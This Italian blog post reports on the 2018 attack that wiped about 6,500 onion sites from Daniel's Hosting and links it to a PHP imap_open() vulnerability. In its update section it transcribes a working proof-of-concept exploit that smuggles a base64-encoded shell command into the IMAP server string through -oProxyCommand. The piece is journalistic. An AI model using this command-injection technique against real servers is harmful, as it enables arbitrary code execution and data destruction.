L’attacco hacker che ha cancellato un pezzo di Deep Web

Uno dei più popolari servizi di hosting nel Dark Web, chiamato “Daniel’s Hosting”, ha subito nell’ultima settimana un attacco informatico che ha portato la cancellazione di tutti i siti web che erano caricati sul suo disco.

Il servizio contava circa 6500 diversi siti web Onion, tutti ormai dimenticati.

Ha detto Daniel Winzen, l’amministratore del sito:

Nel Dark Web non esistono backup […] non c’è modo di recuperare i dati da questo breach. Ormai sono persi

Causa del successo dell’attacco sembrerebbe essere stata una vulnerabilità del framework PHP, ossia la funzione imap_open(). Questa è solo una speculazione dell’amministratore, ma si hanno valide ragioni per credere che sia stata la porta di accesso che ha permesso la cancellazione di tutto il sistema. Una delle quali, sarebbe il fatto che l’attacco è stato fatto il giorno successivo all’uscita di un’exploit che sfrutterebbe tale vulnerabilità, consultabile su GitHub qui.

Come ciliegina sulla torta, anche l’account root è stato cancellato dal sistema.
Stranamente, gli altri account presenti nel sistema, compresa la cartella /home/, non sono stati colpiti dall’attacco. È evidente, quindi, che il target dell’attacco fosse esclusivamente il servizio di hosting.

Secondo Daniel, il servizio potrebbe tornare online a Dicembre, quando la vulnerabilità sarà stata corretta.

Il servizio di hosting fornito da Daniel, ospitava tra le più svariate tipologie di siti web, dai forum, alle chat, alle board, ai mercati neri.

Una delle speculazioni che sono state fatte riguardo l’attacco, sarebbe il fatto che Daniel hostava una chat IRC sulla sua home page, ritenuta successivamente un punto di ritrovo per pedofili. La comunità di pedofili sul Deep Web è vista negativamente da numerosi hacker, pertanto si ha motivo di credere che sia stata una scusante per ricevere l’attacco.

L’attacco ha portato una grave perdita nel mondo del Deep e Dark Web.
Daniel hostava una lista di link visitato quotidianamente da più di 500 persone, presumibilmente naviganti inesperti, rendendo “Daniel’s Hosting” uno tra i più famosi fornitori di link Onion (dopo  Fresh Onions e Hidden Wiki).

php-bug.png

AGGIORNAMENTO:
In caso l’exploit venisse rimosso da GitHub, ho deciso di trascriverlo qui sotto:

<?php
# echo '1234567890'>/tmp/test0001
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());

Fonte dell’articolo:
https://nakedsecurity.sophos.com/2018/11/21/hacker-erases-6500-sites-from-the-dark-web/

Annunci

Rispondi

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione /  Modifica )

Google photo

Stai commentando usando il tuo account Google. Chiudi sessione /  Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione /  Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione /  Modifica )

Connessione a %s...